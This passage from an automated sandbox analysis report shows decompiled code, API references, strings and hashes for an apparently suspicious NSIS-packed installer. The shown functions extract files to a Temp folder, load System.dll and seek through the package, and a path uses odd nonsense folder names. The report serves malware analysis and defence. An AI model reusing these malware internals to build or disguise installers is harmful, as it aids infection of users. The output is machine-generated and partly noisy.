					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x4702e8;
						goto L32;
					} else {
						E00406668("C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp");
						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x4702e8 =  &( *0x4702e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
				 *0x470314 =  *0x470314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x470314 =  *0x470314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38));
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00002000,004037B0,00468260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

C:\Users\user\AppData\Local\Temp\nsc76F4.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation$C:\Users\user\AppData\Local\Temp\nsc76F4.tmp$C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll$Call
API String ID: 1941528284-1799722283
Opcode ID: 5507efedd8ef005fc722e589b66a64470e710b09929a6c1299cc36a1ea50f503
Instruction ID: 06bee6ff3ccd5f5b501047e13325295af2c3c71c73bd90c8d8b76e0e1c152b43
Opcode Fuzzy Hash: 5507efedd8ef005fc722e589b66a64470e710b09929a6c1299cc36a1ea50f503
Instruction Fuzzy Hash: CD41B771400209BADF10BBB5CD85DAE3A79EF45318B20473FF422B20E1DA3D8951DA2D

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x468244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x470314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x43e728, 0x43e728, _a4);
					}
					_t27 = lstrlenW(0x43e728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x468228, 0x43e728); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x43e728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x43e728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x8000) {
							_t27 = lstrcatW(0x43e728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,004030A8), ref: 00405725
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000), ref: 004068A4

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll, xrefs: 004056EB, 004056FB, 00405701, 00405724, 00405730

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll
API String ID: 1495540970-1800326282
Opcode ID: 779e989e11e7f56ecd15eb762b90414c7a0500fd8ad26af2e56af92178675a1e
Instruction ID: c237e01f64be4bcbd85ac878387eaebe6c7da7ae9e1135af4804bf1e214aac79
Opcode Fuzzy Hash: 779e989e11e7f56ecd15eb762b90414c7a0500fd8ad26af2e56af92178675a1e
Instruction Fuzzy Hash: D4217A71900518BADB119FA6DD84A8EBFB8EB45360F10817AE904B62A0D77A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t76 - 4));
				} else {
					__ecx = 0x1fff;
					if(__eax > 0x1fff) {
						 *(__ebp - 0x44) = 0x1fff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *((intOrPtr*)(_t76 - 4)) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, ?str?) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, "true"); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, ?str?) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, "true");
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027b6
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: ff2e09ca757180d5741658eaf0f2c0a372e2282fa1403efecdb78a9c85b10216
Instruction ID: 1bbe20be883a7edda52fc2980df0feb54fe6c441a16e3d4a13a965921995db28
Opcode Fuzzy Hash: ff2e09ca757180d5741658eaf0f2c0a372e2282fa1403efecdb78a9c85b10216
Instruction Fuzzy Hash: FE510975D00219AADF20EFD5CA88AAEBBB5FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x4326f4; // 0xaf5aa
				_t34 = _t32 -  *0x41e660 + _a4;
				 *0x47026c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E("true");
					return 0;
				}
				E004035F8( *0x432704);
				SetFilePointer( *0x40a01c,  *0x41e660, 0, 0); // executed
				 *0x432700 = _t34;
				 *0x4326f0 = 0;
				while(1) {
					_t10 =  *0x4326f8; // 0x50a9e
					_t31 = 0x4000;
					_t11 = _t10 -  *0x432704;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x4266f0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x432704 =  *0x432704 + _t31;
					 *0x41e680 = 0x4266f0;
					 *0x41e684 = _t31;
					L6:
					L6:
					if( *0x470270 != 0 &&  *0x470300 == 0) {
						_t19 =  *0x432700; // 0x25783
						 *0x4326f0 = _t19 -  *0x4326f4 - _a4 +  *0x41e660;
						E0040302E(0);
					}
					 *0x41e688 = 0x41e6f0;
					 *0x41e68c = 0x8000; // executed
					_t14 = E00406BB0(0x41e668); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x41e688; // 0x426638
					_t37 = _t36 - 0x41e6f0;
					if(_t37 == 0) {
						__eflags =  *0x41e684; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x4326f4; // 0xaf5aa
						if(_t16 -  *0x41e660 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x41e6f0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x41e660 =  *0x41e660 + _t37;
					_t49 =  *0x41e684; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x0040347c
0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403523
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNELBASE(000AF5AA,00000000,00000000,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Strings

8fB, xrefs: 00403549, 00403562
hA, xrefs: 00403544
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83, xrefs: 004034ED, 004034F3

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
